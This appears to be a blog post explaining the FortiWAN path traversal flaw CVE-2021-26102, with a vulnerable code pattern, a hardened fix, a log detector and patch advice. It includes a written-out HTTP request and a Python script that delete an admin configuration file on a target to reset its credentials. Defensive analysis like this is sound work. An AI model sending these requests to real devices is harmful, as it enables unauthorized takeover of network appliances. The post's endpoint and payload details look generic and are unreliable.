In cybersecurity, vulnerabilities come in all shapes and sizes, but some bugs are both simple and powerful. CVE-2021-26102 is one such example—a relative path traversal vulnerability in FortiWAN, a network device from Fortinet. This bug allows an attacker to delete files on the system, even resetting the admin password back to factory settings, and all of this can happen without needing to log in. Thankfully, understanding how this works can help strengthen defenses.
This post will walk you through how the bug works, show example payloads, and discuss why this issue is so critical.
Affected versions: FortiWAN 4.4 (all versions)
This problem exists because the system fails to properly sanitize file paths in a certain HTTP POST request, which means attackers can request file operations outside the intended directory—including deleting files elsewhere on the device.
- An attacker can delete sensitive files, such as configuration files, from the system.
- Deleting these files can even reset the admin password, letting an attacker take full control after a few simple steps.
Root Cause
The bug is triggered by a POST request to a specific endpoint (often /cgi-bin/portal), where the filename parameter is not properly sanitized. If an attacker supplies a file path with ../ (dot-dot-slash), they can escape out of the expected directory and manipulate system files.
Here's a typical vulnerable code pattern (simplified for illustration):

```python
import os

# Pseudocode from backend: the user-supplied filename is appended to the
# data directory with no validation, so '..' segments are honoured as-is.
def delete_file(request):
    filename = request.POST['filename']
    filepath = "/home/www/data/" + filename
    os.remove(filepath)
```

If filename is ../../etc/password, filepath resolves to /home/etc/password (two directories above /home/www/data/), an unintended file!
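For contrast, here is a hardened counterpart to the snippet above. This is an added example written for this post, not FortiWAN's code or Fortinet's fix; the function names `resolve_in_base`, `delete_file_hardened` and `demo` are mine, and `/home/www/data` is simply the directory used in the snippet. The check canonicalises the joined path with `os.path.realpath` and refuses anything whose canonical form is not under the base directory, which rejects `../` traversal, absolute paths and symlinks that point outside in one place. The `demo()` function exercises it inside a throwaway directory so it runs offline without touching real files.

```python
import os
import tempfile

# Intended document root from the vulnerable snippet above.
DATA_DIR = "/home/www/data"


def resolve_in_base(base_dir, filename):
    """Return the canonical absolute path of filename under base_dir, or None
    when the result would land outside base_dir.

    realpath() collapses '..' segments and resolves symlinks, and os.path.join
    discards base_dir when filename is absolute, so a single commonpath check
    rejects '../' traversal, absolute paths and out-of-tree symlinks.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows share no prefix at all
        inside = False
    return candidate if inside else None


def delete_file_hardened(base_dir, filename):
    """Hardened version of delete_file(): removes only a regular file that
    resolves inside base_dir. Returns True when a file was actually deleted."""
    target = resolve_in_base(base_dir, filename)
    if target is None or not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo():
    """Exercise the check in a constructed sandbox directory: one file inside
    the data directory and one stand-in config file one level above it."""
    with tempfile.TemporaryDirectory() as tmp:
        data = os.path.join(tmp, "data")
        os.mkdir(data)
        config = os.path.join(tmp, "AdminUser")  # stand-in for a config file
        for path in (os.path.join(data, "upload.txt"), config):
            with open(path, "w") as fh:
                fh.write("x")
        return {
            "inside": delete_file_hardened(data, "upload.txt"),
            "traversal": delete_file_hardened(data, "../AdminUser"),
            "absolute": delete_file_hardened(data, config),
            "config_survived": os.path.exists(config),
        }


if __name__ == "__main__":
    # The page's traversal payload is rejected without touching the filesystem.
    print(delete_file_hardened(DATA_DIR, "../../etc/config/AdminUser"))  # False
    print(demo())
```

The important design point is that the check runs on the fully resolved path, not on the raw string: filtering the literal characters `../` is easily bypassed by encoding tricks, whereas comparing canonical paths cannot be fooled by how the traversal was spelled.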
Exploit Steps
What can an attacker do?
By sending a crafted HTTP POST request, they can delete crucial files. For FortiWAN, deleting certain configuration files resets the Admin password to its default.
Example Exploit Request
```http
POST /cgi-bin/portal HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
filename=../../etc/config/AdminUser
action=delete
```
- filename=../../etc/config/AdminUser uses path traversal to reach the configuration file outside the intended directory.
- Deleting this (or a related) file causes the system to revert to its default credentials after a reboot, or sometimes immediately.
Now, anyone can log in with the default admin/password combination.
Here’s a simple Python snippet for educational purposes:

```python
import requests

target = "http://victim-ip/cgi-bin/portal"
payload = {
    "filename": "../../etc/config/AdminUser",
    "action": "delete"
}
resp = requests.post(target, data=payload)
print(f"Status: {resp.status_code}")
```
> Warning: Only test your own devices or with explicit permission!
Official Reference and Patch
Fortinet Security Advisory:
- FG-IR-20-179 FortiWAN Path Traversal
Fortinet patched this bug in FortiWAN 4.5.8 and above. If you’re running an older version, update now.
1. Update firmware to the latest FortiWAN version.
2. Monitor logs for suspicious POST requests targeting /cgi-bin/portal with unusual file paths.
3. Disable unnecessary HTTP/API interfaces if not needed.
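Step 2 is easier to act on with a concrete detector, so here is one as an added example (my code, not Fortinet's tooling). It assumes a reverse proxy or WAF in front of the appliance that records POST bodies in a simple one-line-per-request format, because an ordinary access log never shows form parameters; the `SAMPLE_LOG` lines, the source addresses and the log layout are all constructed for this demo. The detector decodes each parameter up to twice so that `%2e%2e%2f` and double-encoded `%252e` variants collapse to the literal form, then flags only a whole `..` path segment, so a filename such as `..hidden.cfg` does not produce a false positive.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed proxy-style request log (not FortiWAN's own format): timestamp,
# source IP, method, path and the form body as the proxy recorded it.
SAMPLE_LOG = """\
2024-12-19T14:15:05Z 203.0.113.5 POST /cgi-bin/portal body="filename=report.csv&action=delete"
2024-12-19T14:15:06Z 203.0.113.5 POST /cgi-bin/portal body="filename=../../etc/config/AdminUser&action=delete"
2024-12-19T14:15:07Z 198.51.100.9 POST /cgi-bin/portal body="filename=..%2F..%2Fetc%2Fconfig%2FAdminUser&action=delete"
2024-12-19T14:15:08Z 198.51.100.9 POST /cgi-bin/portal body="filename=%252e%252e%252fetc%252fconfig%252fAdminUser&action=delete"
2024-12-19T14:15:09Z 203.0.113.5 POST /cgi-bin/portal body="filename=..hidden.cfg&action=delete"
2024-12-19T14:15:10Z 203.0.113.5 GET /cgi-bin/other body=""
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body="(?P<body>[^"]*)"$'
)
# A '..' that forms a whole path segment, with either slash style as separator.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def normalize(value):
    """URL-decode up to twice so single- and double-encoded dots and slashes
    collapse to their literal form, and drop NUL bytes used to truncate paths."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\x00", "")


def has_traversal(value):
    """True when a '..' segment survives normalisation."""
    return TRAVERSAL_RE.search(normalize(value)) is not None


def analyze_line(line):
    """Return an alert dict for a POST to /cgi-bin/portal whose form body
    carries a traversal sequence in any parameter, otherwise None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST" or not m["path"].startswith("/cgi-bin/portal"):
        return None
    params = parse_qs(m["body"], keep_blank_values=True)  # decodes once itself
    for name, values in params.items():
        for value in values:
            if has_traversal(value):
                return {"ts": m["ts"], "src": m["src"], "param": name, "value": normalize(value)}
    return None


def scan(log_text):
    """Run analyze_line over every line and keep the alerts."""
    return [alert for alert in map(analyze_line, log_text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Against the sample log this yields three alerts (the plain, single-encoded and double-encoded traversal attempts) and stays quiet on the benign delete, the dotted filename and the GET to another path. In production the same `has_traversal` check can be pointed at whatever field your proxy or SIEM exposes for the request body.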
Conclusion
CVE-2021-26102 is a textbook example of how simple code mistakes—like missing path validation—can have severe consequences in real-world systems. Remote attackers can exploit this flaw to reset admin passwords and take over FortiWAN appliances. If you operate such devices, check your firmware version and update as soon as possible.
For more details and official recommendations, refer to the original advisory.
Further Reading
- CWE-23: Relative Path Traversal (MITRE)
- FortiWAN Documentation & Downloads
*If you found this explanation helpful, please share it with your IT and security teams!*
Timeline
Published on: 12/19/2024 14:15:05 UTC